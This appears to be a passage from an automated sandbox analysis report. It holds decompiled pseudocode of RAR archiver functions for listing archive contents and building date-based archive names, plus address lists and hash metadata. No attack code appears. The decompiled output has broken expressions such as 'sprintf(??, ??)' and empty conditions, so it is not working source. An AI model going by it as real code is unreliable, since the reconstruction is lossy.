				goto 0x50b36f3a;
				E00007FF67FF650B5B008();
				_t225 =  *((intOrPtr*)(_t418 + 0x224c));
				_t277 = _t225 - 5;
				if (_t277 == 0) goto 0x50b36fef;
				_t226 = _t225 - 2;
				if (_t277 == 0) goto 0x50b36e9c;
				if (_t226 != 1) goto 0x50b36f30;
				if (r13b == 0) goto 0x50b36f30;
				if (r14w != 0x54) goto 0x50b36f30;
				if ( *((intOrPtr*)(_t421 + 0x40)) == 0) goto 0x50b36f30;
				 *((char*)(_t421 + 0x30)) =  *((intOrPtr*)(_t408 + 0x7157));
				 *(_t421 + 0x28) = 0;
				 *((char*)(_t421 + 0x20)) = _t226;
				r9b =  *((intOrPtr*)(_t421 + 0x42));
				_t50 = _t421 + 0x41; // 0x7f9
				_t51 = _t418 + 0x57e0; // -16464
				_t52 = _t421 + 0x60; // 0x818
				E00007FF67FF650B37530(_t243, 0, _t254, 0x50b821cc, _t321, _t52, _t51, _t50, _t444);
				goto 0x50b36f30;
				 *((intOrPtr*)(_t421 + 0x30)) = 0;
				 *(_t421 + 0x28) = _t321;
				 *((char*)(_t421 + 0x20)) = 0;
				r9d = 6;
				r8d = 0;
				_t56 = _t418 + 0x3478; // -25528
				_t165 = E00007FF67FF650B24498(_t226, _t321 + 1, _t321, _t408, _t56, _t408, _t411, _t418, _t50);
				r13b = _t165 != 0;
				if (_t165 == 0) goto 0x50b36f30;
				_t57 = _t418 + 0x34a0; // -25488
				E00007FF67FF650B37F90(1, _t254, 0x50b821cc, _t321, 0x50ba7a90, _t57, _t444);
				 *((char*)(_t421 + 0x30)) =  *((intOrPtr*)(_t408 + 0x7157));
				 *(_t421 + 0x28) =  *((intOrPtr*)(_t421 + 0x43));
				 *((char*)(_t421 + 0x20)) =  *((intOrPtr*)(_t421 + 0x44));
				r9b =  *((intOrPtr*)(_t421 + 0x42));
				_t65 = _t421 + 0x41; // 0x7f9
				_t66 = _t418 + 0x3478; // -25528
				_t67 = _t421 + 0x60; // 0x818
				E00007FF67FF650B37530(_t243, 0, _t254, 0x50b821cc, _t321, _t67, _t66, _t65, _t444);
				if ( *((intOrPtr*)(_t418 + 0x4520)) != 0) goto 0x50b36f29;
				_t451 = _t321 +  *((intOrPtr*)(_t418 + 0x44e8));
				_t459 = _t321 +  *((intOrPtr*)(_t418 + 0x44e0));
				E00007FF67FF650B1A3E8();
				_t72 = _t421 + 0x60; // 0x818
				_t347 = _t72;
				_t171 = E00007FF67FF650B1E5A8(_t347, _t408, _t411);
				if (0x50b821cc != 0) goto 0x50b36e2a;
				if (r14w == 0x42) goto 0x50b37103;
				if (r14w == 0x54) goto 0x50b37103;
				if ( *((intOrPtr*)(_t421 + 0x41)) == 0) goto 0x50b370f1;
				_t74 = _t347 + 0x14; // 0x14
				r13d = _t74;
				r8d = r13d;
				_t75 = _t418 + 0x8f30; // -2304
				_t172 = E00007FF67FF650B5A17C(_t171, _t321, _t451, _t75, _t411, _t65, _t444, _t447);
				r8d = r13d;
				_t76 = _t418 + 0x8f58; // -2264
				E00007FF67FF650B5A17C(_t172, _t321, _t459, _t76, _t411, _t65, _t444, _t447);
				if ( *(_t421 + 0x46) != 0x56) goto 0x50b3709f;
				E00007FF67FF650B283F0(L"\n----------- ---------  -------- ----- ---------- -----  --------  ----", _t76, _t65, _t444);
				r9d = E00007FF67FF650B59AF8(_t451);
				 *(_t421 + 0x28) = 1;
				_t79 = _t418 + 0x8f80; // -2224
				_t318 = _t79;
				 *((long long*)(_t421 + 0x20)) = _t318;
				_t81 = _t418 + 0x8f58; // -2264
				_t82 = _t418 + 0x8f30; // -2304
				E00007FF67FF650B283F0(L"\n%21ls %9ls %3d%%  %-27ls %u", _t82, _t81, _t444);
				goto 0x50b370c8;
				if ( *((intOrPtr*)(_t418 + 0x57bf)) == r13b) goto 0x50b37033;
				if ( *((intOrPtr*)(_t418 + 0x7ed8)) != 2) goto 0x50b37033;
				E00007FF67FF650B54598(0xdb0, _t243, _t321, _t411, _t418, _t81);
				_t445 = _t318;
				 *((intOrPtr*)(_t421 + 0x20)) =  *((intOrPtr*)(_t418 + 0x7f04)) + 1;
				_t87 = _t418 + 0x8f80; // -2224
				E00007FF67FF650B1657C(0xdb0, _t318, _t87, _t82, L"%.10ls %u", _t318);
				if (r14w != 0x54) goto 0x50b36f4d;
				if ( *((intOrPtr*)(_t421 + 0x40)) == 0) goto 0x50b37105;
				E00007FF67FF650B54598(0xdf0, _t243, _t321, _t411, _t418, L"%.10ls %u");
				E00007FF67FF650B283F0(L"\n%12ls: %ls", _t318, L"EOF", _t318);
				if ( *((intOrPtr*)(_t418 + 0x8f80)) == 0) goto 0x50b37091;
				E00007FF67FF650B54598(0xde8, _t243, _t321, _t411, _t418, L"EOF");
				_t90 = _t418 + 0x8f80; // -2224
				E00007FF67FF650B283F0(L"\n%12ls: %ls", _t318, _t90, _t318);
				E00007FF67FF650B283F0("\n", _t318, _t90, _t318);
				goto 0x50b37105;
				E00007FF67FF650B283F0(L"\n----------- ---------  ---------- -----  ----", _t318, _t90, _t318);
				r9d = 1;
				_t91 = _t418 + 0x8f80; // -2224
				_t441 = _t91;
				_t92 = _t418 + 0x8f30; // -2304
				E00007FF67FF650B283F0(L"\n%21ls  %-16ls  %u", _t92, _t91, _t318);
				 *(_t421 + 0x50) =  *(_t421 + 0x50) + 1;
				 *(_t421 + 0x58) =  *(_t421 + 0x58) + _t451;
				 *(_t421 + 0x48) =  *(_t421 + 0x48) + _t459;
				E00007FF67FF650B283F0("\n", _t92, _t91, _t318);
				r13b = 0;
				goto 0x50b3710a;
				E00007FF67FF650B54598(0xe00, _t243, _t321,  *(_t421 + 0x48) + _t459, _t418, _t91);
				_t188 = E00007FF67FF650B283F0(_t318, _t92, _t91, _t445);
				r12d =  *((intOrPtr*)(_t421 + 0x54));
				r12d = r12d + 1;
				 *((intOrPtr*)(_t421 + 0x54)) = r12d;
				if ( *((intOrPtr*)(_t408 + 0x7178)) == _t321) goto 0x50b371aa;
				if ( *((intOrPtr*)(_t418 + 0x4521)) != 0) goto 0x50b3713d;
				if ( *((intOrPtr*)(_t418 + 0x224c)) != 5) goto 0x50b371aa;
				if ( *((intOrPtr*)(_t418 + 0x57bc)) == 0) goto 0x50b371aa;
				r9d =  *(_t408 + 0x952a) & 0x0000ffff;
				r8d = 0;
				0x50b68c4c();
				if (_t188 == 0) goto 0x50b371aa;
				r8d = 0;
				_t108 = _t421 + 0x60; // 0x818
				E00007FF67FF650B1A3A0(_t321, _t108, _t92,  *(_t421 + 0x48));
				_t109 = _t421 + 0x60; // 0x818
				if (E00007FF67FF650B18E38(1, _t321, _t109) != 0) goto 0x50b36c16;
				goto 0x50b37182;
				if ( *((long long*)(_t408 + 0xb7c0)) - 2 >= 0) goto 0x50b371aa;
				if (r14w == 0x42) goto 0x50b371aa;
				E00007FF67FF650B54598(0xd18, _t243, _t321,  *(_t421 + 0x48), _t418, _t91);
				_t112 = _t418 - 0x66; // -39062
				E00007FF67FF650B283F0(_t318, _t112, _t91, _t445);
				_t113 = _t421 + 0x60; // 0x818
				E00007FF67FF650B175D4(_t321, _t113);
				r8d = 0x800;
				_t114 = _t418 + 0x8ff0; // -2112
				if (E00007FF67FF650B24300(_t321, _t408, _t114,  *(_t421 + 0x48), _t418) != 0) goto 0x50b36bab;
				_t213 =  *(_t421 + 0x50);
				r13d =  *(_t421 + 0x46) & 0x0000ffff;
				if ( *((intOrPtr*)(_t408 + 0x6134)) == 0) goto 0x50b371f9;
				_t195 = E00007FF67FF650B5785C(_t243, _t255, _t408 + 0x6030, _t408);
				if (r12d - 1 <= 0) goto 0x50b372a0;
				if (r14w == 0x42) goto 0x50b372a0;
				if (r14w == 0x54) goto 0x50b372a0;
				r8d = 0x14;
				_t120 = _t418 + 0x8f30; // -2304
				_t196 = E00007FF67FF650B5A17C(_t195, _t321,  *(_t421 + 0x58), _t120,  *(_t421 + 0x48), _t91, _t445, _t447);
				r8d = 0x14;
				_t121 = _t418 + 0x8f58; // -2264
				E00007FF67FF650B5A17C(_t196, _t321,  *(_t421 + 0x48), _t121,  *(_t421 + 0x48), _t441, _t445, _t447);
				if (r13w != 0x56) goto 0x50b37283;
				r9d = E00007FF67FF650B59AF8( *(_t421 + 0x58));
				 *(_t421 + 0x28) = _t213;
				 *((long long*)(_t421 + 0x20)) = 0x50b82224;
				_t124 = _t418 + 0x8f58; // -2264
				_t125 = _t418 + 0x8f30; // -2304
				E00007FF67FF650B283F0(L"%21ls %9ls %3d%% %28ls %u", _t125, _t124, _t445);
				goto 0x50b372a0;
				r9d = _t213;
				_t126 = _t418 + 0x8f30; // -2304
				return E00007FF67FF650B69D10(E00007FF67FF650B283F0(L"%21ls %18s %lu", _t126, 0x50b823ec, _t445), 0,  *(_t418 + 0x9ff0) ^ _t421);
			}





































                                                                                                            0x7ff650b36ae8
                                                                                                            0x7ff650b36ae8
                                                                                                            0x7ff650b36ae8
                                                                                                            0x7ff650b36ae8
                                                                                                            0x7ff650b36aeb
                                                                                                            0x7ff650b36aef
                                                                                                            0x7ff650b36af3
                                                                                                            0x7ff650b36b00
                                                                                                            0x7ff650b36b00
                                                                                                            0x7ff650b36b0c
                                                                                                            0x7ff650b36b11
                                                                                                            0x7ff650b36b14
                                                                                                            0x7ff650b36b1b
                                                                                                            0x7ff650b36b1e
                                                                                                            0x7ff650b36b25
                                                                                                            0x7ff650b36b2c
                                                                                                            0x7ff650b36b31
                                                                                                            0x7ff650b36b34
                                                                                                            0x7ff650b36b39
                                                                                                            0x7ff650b36b3c
                                                                                                            0x7ff650b36b42
                                                                                                            0x7ff650b36b46
                                                                                                            0x7ff650b36b4e
                                                                                                            0x7ff650b36b53
                                                                                                            0x7ff650b36b58
                                                                                                            0x7ff650b36b62
                                                                                                            0x7ff650b36b67
                                                                                                            0x7ff650b36b69
                                                                                                            0x7ff650b36b72
                                                                                                            0x7ff650b36b77
                                                                                                            0x7ff650b36b7f
                                                                                                            0x7ff650b36b8a
                                                                                                            0x7ff650b36b8f
                                                                                                            0x7ff650b36b95
                                                                                                            0x7ff650b36ba5
                                                                                                            0x7ff650b36bb1
                                                                                                            0x7ff650b36bba
                                                                                                            0x7ff650b36bc2
                                                                                                            0x7ff650b36bc7
                                                                                                            0x7ff650b36bcd
                                                                                                            0x7ff650b36bd4
                                                                                                            0x7ff650b36be0
                                                                                                            0x7ff650b36be2
                                                                                                            0x7ff650b36be7
                                                                                                            0x7ff650b36bec
                                                                                                            0x7ff650b36bf9
                                                                                                            0x7ff650b36bfe
                                                                                                            0x7ff650b36c04
                                                                                                            0x7ff650b36c10
                                                                                                            0x7ff650b36c16
                                                                                                            0x7ff650b36c1f
                                                                                                            0x7ff650b36c25
                                                                                                            0x7ff650b36c2a
                                                                                                            0x7ff650b36c34
                                                                                                            0x7ff650b36c3c
                                                                                                            0x7ff650b36c47
                                                                                                            0x7ff650b36c51
                                                                                                            0x7ff650b36c60
                                                                                                            0x7ff650b36c7a
                                                                                                            0x7ff650b36c7e
                                                                                                            0x7ff650b36c8c
                                                                                                            0x7ff650b36ca3
                                                                                                            0x7ff650b36cae
                                                                                                            0x7ff650b36cba
                                                                                                            0x7ff650b36cd0
                                                                                                            0x7ff650b36cdc
                                                                                                            0x7ff650b36ce5
                                                                                                            0x7ff650b36cfb
                                                                                                            0x7ff650b36d06
                                                                                                            0x7ff650b36d11
                                                                                                            0x7ff650b36d1a
                                                                                                            0x7ff650b36d2a
                                                                                                            0x7ff650b36d35
                                                                                                            0x7ff650b36d3a
                                                                                                            0x7ff650b36d41
                                                                                                            0x7ff650b36d57
                                                                                                            0x7ff650b36d5e
                                                                                                            0x7ff650b36d68
                                                                                                            0x7ff650b36d71
                                                                                                            0x7ff650b36d89
                                                                                                            0x7ff650b36d94
                                                                                                            0x7ff650b36da2
                                                                                                            0x7ff650b36dab
                                                                                                            0x7ff650b36dc3
                                                                                                            0x7ff650b36dce
                                                                                                            0x7ff650b36ddb
                                                                                                            0x7ff650b36de2
                                                                                                            0x7ff650b36dfa
                                                                                                            0x7ff650b36e05
                                                                                                            0x7ff650b36e11
                                                                                                            0x7ff650b36e16
                                                                                                            0x7ff650b36e25
                                                                                                            0x7ff650b36e2a
                                                                                                            0x7ff650b36e2f
                                                                                                            0x7ff650b36e35
                                                                                                            0x7ff650b36e38
                                                                                                            0x7ff650b36e3e
                                                                                                            0x7ff650b36e41
                                                                                                            0x7ff650b36e46
                                                                                                            0x7ff650b36e4f
                                                                                                            0x7ff650b36e5a
                                                                                                            0x7ff650b36e64
                                                                                                            0x7ff650b36e70
                                                                                                            0x7ff650b36e74
                                                                                                            0x7ff650b36e78
                                                                                                            0x7ff650b36e7c
                                                                                                            0x7ff650b36e81
                                                                                                            0x7ff650b36e86
                                                                                                            0x7ff650b36e8d
                                                                                                            0x7ff650b36e92
                                                                                                            0x7ff650b36e97
                                                                                                            0x7ff650b36e9c
                                                                                                            0x7ff650b36ea0
                                                                                                            0x7ff650b36ea5
                                                                                                            0x7ff650b36ea9
                                                                                                            0x7ff650b36eaf
                                                                                                            0x7ff650b36eb2
                                                                                                            0x7ff650b36ebc
                                                                                                            0x7ff650b36ec3
                                                                                                            0x7ff650b36ec9
                                                                                                            0x7ff650b36ecb
                                                                                                            0x7ff650b36ede
                                                                                                            0x7ff650b36ee9
                                                                                                            0x7ff650b36ef1
                                                                                                            0x7ff650b36ef9
                                                                                                            0x7ff650b36efd
                                                                                                            0x7ff650b36f02
                                                                                                            0x7ff650b36f07
                                                                                                            0x7ff650b36f0e
                                                                                                            0x7ff650b36f13
                                                                                                            0x7ff650b36f1e
                                                                                                            0x7ff650b36f20
                                                                                                            0x7ff650b36f29
                                                                                                            0x7ff650b36f35
                                                                                                            0x7ff650b36f3a
                                                                                                            0x7ff650b36f3a
                                                                                                            0x7ff650b36f3f
                                                                                                            0x7ff650b36f47
                                                                                                            0x7ff650b36f55
                                                                                                            0x7ff650b36f60
                                                                                                            0x7ff650b36f6c
                                                                                                            0x7ff650b36f72
                                                                                                            0x7ff650b36f72
                                                                                                            0x7ff650b36f76
                                                                                                            0x7ff650b36f79
                                                                                                            0x7ff650b36f83
                                                                                                            0x7ff650b36f88
                                                                                                            0x7ff650b36f8b
                                                                                                            0x7ff650b36f95
                                                                                                            0x7ff650b36fa0
                                                                                                            0x7ff650b36fad
                                                                                                            0x7ff650b36fbd
                                                                                                            0x7ff650b36fc0
                                                                                                            0x7ff650b36fc4
                                                                                                            0x7ff650b36fc4
                                                                                                            0x7ff650b36fcb
                                                                                                            0x7ff650b36fd0
                                                                                                            0x7ff650b36fd7
                                                                                                            0x7ff650b36fe5
                                                                                                            0x7ff650b36fea
                                                                                                            0x7ff650b36ff5
                                                                                                            0x7ff650b36ffe
                                                                                                            0x7ff650b3700d
                                                                                                            0x7ff650b37012
                                                                                                            0x7ff650b37015
                                                                                                            0x7ff650b37025
                                                                                                            0x7ff650b3702c
                                                                                                            0x7ff650b37038
                                                                                                            0x7ff650b37042
                                                                                                            0x7ff650b3704d
                                                                                                            0x7ff650b37063
                                                                                                            0x7ff650b3706f
                                                                                                            0x7ff650b37076
                                                                                                            0x7ff650b3707e
                                                                                                            0x7ff650b3708c
                                                                                                            0x7ff650b37098
                                                                                                            0x7ff650b3709d
                                                                                                            0x7ff650b370a6
                                                                                                            0x7ff650b370ab
                                                                                                            0x7ff650b370ae
                                                                                                            0x7ff650b370ae
                                                                                                            0x7ff650b370b5
                                                                                                            0x7ff650b370c3
                                                                                                            0x7ff650b370c8
                                                                                                            0x7ff650b370cc
                                                                                                            0x7ff650b370d9
                                                                                                            0x7ff650b370e5
                                                                                                            0x7ff650b370ea
                                                                                                            0x7ff650b370ef
                                                                                                            0x7ff650b370f6
                                                                                                            0x7ff650b370fe
                                                                                                            0x7ff650b3710a
                                                                                                            0x7ff650b3710f
                                                                                                            0x7ff650b37112
                                                                                                            0x7ff650b3711e
                                                                                                            0x7ff650b3712a
                                                                                                            0x7ff650b37133
                                                                                                            0x7ff650b3713b
                                                                                                            0x7ff650b3713d
                                                                                                            0x7ff650b37145
                                                                                                            0x7ff650b3714f
                                                                                                            0x7ff650b37156
                                                                                                            0x7ff650b37158
                                                                                                            0x7ff650b3715d
                                                                                                            0x7ff650b37162
                                                                                                            0x7ff650b37169
                                                                                                            0x7ff650b37175
                                                                                                            0x7ff650b3717b
                                                                                                            0x7ff650b3718a
                                                                                                            0x7ff650b37191
                                                                                                            0x7ff650b37198
                                                                                                            0x7ff650b371a0
                                                                                                            0x7ff650b371a4
                                                                                                            0x7ff650b371aa
                                                                                                            0x7ff650b371af
                                                                                                            0x7ff650b371b4
                                                                                                            0x7ff650b371ba
                                                                                                            0x7ff650b371cb
                                                                                                            0x7ff650b371d1
                                                                                                            0x7ff650b371da
                                                                                                            0x7ff650b371eb
                                                                                                            0x7ff650b371f4
                                                                                                            0x7ff650b371fd
                                                                                                            0x7ff650b37208
                                                                                                            0x7ff650b37213
                                                                                                            0x7ff650b3721e
                                                                                                            0x7ff650b37221
                                                                                                            0x7ff650b3722b
                                                                                                            0x7ff650b37230
                                                                                                            0x7ff650b37233
                                                                                                            0x7ff650b3723d
                                                                                                            0x7ff650b37247
                                                                                                            0x7ff650b37254
                                                                                                            0x7ff650b37257
                                                                                                            0x7ff650b37262
                                                                                                            0x7ff650b37267
                                                                                                            0x7ff650b3726e
                                                                                                            0x7ff650b3727c
                                                                                                            0x7ff650b37281
                                                                                                            0x7ff650b37283
                                                                                                            0x7ff650b3728d
                                                                                                            0x7ff650b372cf

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: LoadString$fflushswprintf
                                                                                                            • String ID: %12ls: %ls$%12ls: %ls$%21ls %-16ls %u$%21ls %9ls %3d%% %-27ls %u$%s: $%s: %s$----------- --------- -------- ----- ---------- ----- -------- ----$----------- --------- ---------- ----- ----$%.10ls %u$%21ls %18s %lu$%21ls %9ls %3d%% %28ls %u$%s%s$%s%s$%s%s$%s%s$%s%s$%s%s$%s%s$EOF$RAR 1.4$RAR 4$RAR 5$V
                                                                                                            • API String ID: 1946543793-4283793440
                                                                                                            • Opcode ID: cbcf922f9a185e1e36753e7e87cc88d162ac71470cf2325a5e319299a9f11bcc
                                                                                                            • Instruction ID: 4f4540db0ae7f67b2805ee7b8305e9859ce3aa8aad8353162363d27ac09114ef
                                                                                                            • Opcode Fuzzy Hash: cbcf922f9a185e1e36753e7e87cc88d162ac71470cf2325a5e319299a9f11bcc
                                                                                                            • Instruction Fuzzy Hash: DF129322A1D683A6EB20DB24D8D00F927A1FF57744F584036DA4FA779ADF2EE505C740
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B43A18 Relevance: 33.5, APIs: 10, Strings: 12, Instructions: 514COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 64%
                                                                                                            			E00007FF67FF650B43A18(void* __esp, void* __rax, long long __rcx, long long __rdx, signed long long __r8) {
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				signed short _t155;
				void* _t157;
				void* _t159;
				void* _t164;
				void* _t166;
				void* _t193;
				signed int _t198;
				char _t221;
				intOrPtr _t244;
				signed int _t265;
				signed long long _t329;
				void* _t333;
				signed long long _t334;
				signed long long _t335;
				signed long long _t337;
				signed long long _t339;
				void* _t343;
				void* _t344;
				signed long long _t345;
				signed long long _t347;
				signed long long _t395;
				long long _t406;
				signed long long _t416;
				signed long long _t418;
				void* _t424;
				char* _t425;
				signed short* _t426;
				signed short* _t427;
				void* _t429;
				void* _t430;
				signed long long _t431;
				signed long long _t433;
				void* _t446;
				void* _t447;
				void* _t448;
				void* _t449;
				signed long long _t454;
				signed long long _t458;

				_t433 = __r8;
				_t429 = _t430 - 0x21f8;
				E00007FF67FF650B69CB0(0x22f8, __rax, _t447, _t448);
				_t431 = _t430 - __rax;
				_t329 =  *0x50b978f0; // 0x27db226282f1
				 *(_t429 + 0x21e0) = _t329 ^ _t431;
				r13d = 0;
				 *((long long*)(_t431 + 0x48)) = __rcx;
				r12d = r9d;
				 *(_t431 + 0x30) = r9d;
				 *((long long*)(_t431 + 0x40)) = __rdx;
				 *((long long*)(_t431 + 0x28)) =  *((intOrPtr*)(_t429 + 0x2260));
				 *((intOrPtr*)(_t431 + 0x21)) = r13b;
				if (( *__r8 & 0x0000ffff) != 0x2b) goto 0x50b43a88;
				 *((char*)(_t431 + 0x21)) = 1;
				_t333 =  !=  ? __r8 : __r8 + 2;
				r8d = 0x80;
				_t389 =  !=  ? _t333 : L"yyyymmddhhmmss";
				E00007FF67FF650B5A390(_t429 - 0x20,  !=  ? _t333 : L"yyyymmddhhmmss", __r8);
				_t221 = r13b;
				r14d = r13d;
				 *((char*)(_t431 + 0x20)) = _t221;
				if ( *(_t429 - 0x20) == r13w) goto 0x50b43b1d;
				_t454 =  &((_t429 - 0x20)[_t416]);
				_t155 = ( *_t454 & 0x0000ffff) - 0x7b;
				if ((0x0000fffd & _t155) == 0) goto 0x50b43c2b;
				if (_t221 != 0) goto 0x50b43b0a;
				E00007FF67FF650B5D5F4();
				if (_t155 != 0x48) goto 0x50b43b51;
				_t21 = _t344 + 2; // 0x2
				r14d = r14d + 1;
				r13d = 0;
				if ( *((intOrPtr*)(_t429 + _t458 * 2 - 0x20)) != r13w) goto 0x50b43acb;
				 *(_t431 + 0x38) = _t454;
				_t157 = E00007FF67FF650B5B5A8(E00007FF67FF650B5B9D8(_t431 + 0x38),  *((intOrPtr*)(_t429 + _t458 * 2 - 0x20)) - r13w, _t344, _t431 + 0x38, _t431 + 0x50, _t416, _t424);
				if ( *((intOrPtr*)(_t431 + 0x48)) != 0) goto 0x50b43c3d;
				 *((intOrPtr*)(_t429 + 0x11e0)) = r13w;
				goto 0x50b43c62;
				if (_t157 == 0x44) goto 0x50b43b72;
				if (_t157 == 0x59) goto 0x50b43b72;
				if (_t21 == 0) goto 0x50b43b74;
				if (_t157 != 0x4d) goto 0x50b43b74;
				 *_t454 = 0x49;
				goto 0x50b43b01;
				if (0x49 != 0x4e) goto 0x50b43b01;
				_t159 = E00007FF67FF650B59DAC(r12d);
				r12d = _t159;
				E00007FF67FF650B5D5F4();
				if (_t159 != 0x4e) goto 0x50b43bbc;
				r15d = 0x4e;
				E00007FF67FF650B5D5F4();
				if (_t159 == r15d) goto 0x50b43ba1;
				_t462 =  *((intOrPtr*)(_t431 + 0x28));
				if (r12d - 1 <= 0) goto 0x50b43c13;
				_t334 = _t333 + _t416;
				r9d = 0;
				if (( &((_t429 - 0x20)[_t334]))[(_t433 | 0xffffffff) + 1] != r9w) goto 0x50b43bd5;
				_t335 = _t334 + _t449;
				E00007FF67FF650B6BAF0();
				if (r12d == 0) goto 0x50b43c10;
				_t164 = memset(r14d, 0x4e,  *(_t429 + _t416 * 2 - 0x20) & 0x0000ffff);
				_t211 =  >  ? r12d : 1;
				 *((char*)( *((intOrPtr*)(_t431 + 0x28)))) = 1;
				r12d =  *(_t431 + 0x30);
				r14d = r14d - 1;
				r14d = r14d + ( >  ? r12d : 1);
				goto 0x50b43b01;
				 *((char*)(_t431 + 0x20)) = 0 |  *_t454 == 0x0000007b;
				goto 0x50b43b0a;
				E00007FF67FF650B4511C(_t164, _t335,  *((intOrPtr*)(_t431 + 0x28)));
				_t166 = E00007FF67FF650B6B0BC(0x2e, _t335);
				 *((intOrPtr*)(_t429 + 0x11e0)) = r13w;
				_t418 = _t335;
				if (_t335 != 0) goto 0x50b43c97;
				E00007FF67FF650B4511C(_t166, _t335,  *((intOrPtr*)(_t431 + 0x28)));
				r14d = 0x800;
				r8d = r14d;
				_t394 =  ==  ? L".rar" : 0x50b845b4;
				E00007FF67FF650B5A390(_t429 + 0x11e0,  ==  ? L".rar" : 0x50b845b4, 2 + ((_t433 | 0xffffffff) + 1) * 2);
				goto 0x50b43cb3;
				r14d = 0x800;
				r8d = r14d;
				_t395 = _t418;
				E00007FF67FF650B5A390(_t429 + 0x11e0, _t395, 2 + ((_t433 | 0xffffffff) + 1) * 2);
				 *_t418 = r13w;
				_t276 =  ==  ? 6 : _t335 - 1;
				_t213 =  *(_t431 + 0x70) - ( ==  ? 6 : _t335 - 1);
				if ( *((intOrPtr*)(_t431 + 0x6c)) >= 0) goto 0x50b43cef;
				if ( *(_t431 + 0x70) - ( ==  ? 6 : _t335 - 1) - 0xfffffffc > 0) goto 0x50b43cec;
				E00007FF67FF650B5B8C4( *(_t431 + 0x50) - 1);
				asm("sbb ecx, ecx");
				goto 0x50b43cef;
				r8d =  *(_t431 + 0x50);
				_t265 = (_t344 + _t395 >> 2) + (_t344 + _t395 >> 2 >> 0x1f);
				sprintf(??, ??);
				r8d =  *(_t431 + 0x54);
				sprintf(??, ??);
				r8d =  *(_t431 + 0x58);
				sprintf(??, ??);
				r8d =  *(_t431 + 0x5c);
				sprintf(??, ??);
				r8d =  *(_t431 + 0x60);
				sprintf(??, ??);
				r8d =  *(_t431 + 0x64);
				sprintf(??, ??);
				r8d = r13d;
				r8b = r13d - _t265 * 7 - 4 >= 0;
				r8d = r8d + _t265 + 1;
				sprintf(??, ??);
				r8d = _t424 + 1;
				sprintf(??, ??);
				r8d =  *(_t431 + 0x70);
				r8d = r8d + 1;
				sprintf(??, ??);
				r8d = r12d;
				sprintf(??, ??);
				_t425 = L"YMDHISWAEN";
				asm("xorps xmm0, xmm0");
				 *(_t429 - 0x68) = _t335;
				asm("movups [esp+0x78], xmm0");
				asm("movups [ebp-0x78], xmm0");
				if (( *(_t429 - 0x20) & 0x0000ffff) == 0) goto 0x50b43e59;
				r12d = 0xfffd;
				if ((r12w & _t429 - 0xffffffffffffffaf) == 0) goto 0x50b43e42;
				if (r13b != 0) goto 0x50b43e49;
				E00007FF67FF650B5D5F4();
				E00007FF67FF650B6C330(_t429 - 0xffffffffffffffaf, _t425, _t446);
				if (_t335 == 0) goto 0x50b43e49;
				_t337 = _t335 - _t425 >> 1;
				 *((intOrPtr*)(_t431 + 0x78 + _t337 * 4)) =  *((intOrPtr*)(_t431 + 0x78 + _t337 * 4)) + 1;
				goto 0x50b43e49;
				if (( *(_t429 + _t418 * 2 - 0x20) & 0x0000ffff) != 0) goto 0x50b43e12;
				 *((intOrPtr*)(_t429 + 0xe0)) = r13w;
				dil = r13b;
				 *((intOrPtr*)(_t431 + 0x20)) = r13b;
				_t345 = _t454;
				if (( *(_t429 - 0x20) & 0x0000ffff) == 0) goto 0x50b44004;
				_t426 = _t429 - 0x20;
				if (_t345 - 0x7f >= 0) goto 0x50b44001;
				if ((0x0000fffd & ( *_t426 & 0x0000ffff) - 0x0000007b) == 0) goto 0x50b43fdf;
				E00007FF67FF650B5D5F4();
				_t193 = E00007FF67FF650B6C330(( *_t426 & 0x0000ffff) - 0x7b, L"YMDHISWAEN", _t446);
				if (_t337 == 0) goto 0x50b43fa4;
				if (dil != 0) goto 0x50b43fa4;
				_t339 = _t337 - L"YMDHISWAEN" >> 1;
				_t406 = _t339 + _t339 * 2 + _t339 + _t339 * 2;
				 *((long long*)(_t431 + 0x28)) = _t406;
				r9d = 0;
				if ( *((intOrPtr*)(_t429 - 0x60 + _t406 + (_t418 | 0xffffffff) + 1)) != r9b) goto 0x50b43ef8;
				_t244 =  *((intOrPtr*)(_t431 + 0x78 + _t339 * 4)) - 1;
				 *((intOrPtr*)(_t431 + 0x78 + _t339 * 4)) = _t244;
				if (_t339 != 1) goto 0x50b43f87;
				if (_t244 != 2) goto 0x50b43f87;
				E00007FF67FF650B5D5F4();
				if (_t193 != 0x4d) goto 0x50b43f82;
				E00007FF67FF650B5D5F4();
				if (_t193 != 0x4d) goto 0x50b43f82;
				_t117 = _t339 + 0x33; // 0x33
				E00007FF67FF650B5B764( *(_t431 + 0x54) - 1, ( *_t426 & 0x0000ffff) - 0x7b, _t339, _t345, _t339 + _t339 * 2, _t406, (_t418 | 0xffffffff) + 1 - _t345, _t426, _t429 - 0x60 + _t406, _t446);
				E00007FF67FF650B5A390(_t429 + 0xe0 + _t345 * 2, _t339, (_t418 | 0xffffffff) + 1 - _t345);
				_t347 = (_t345 | 0xffffffff) + 1;
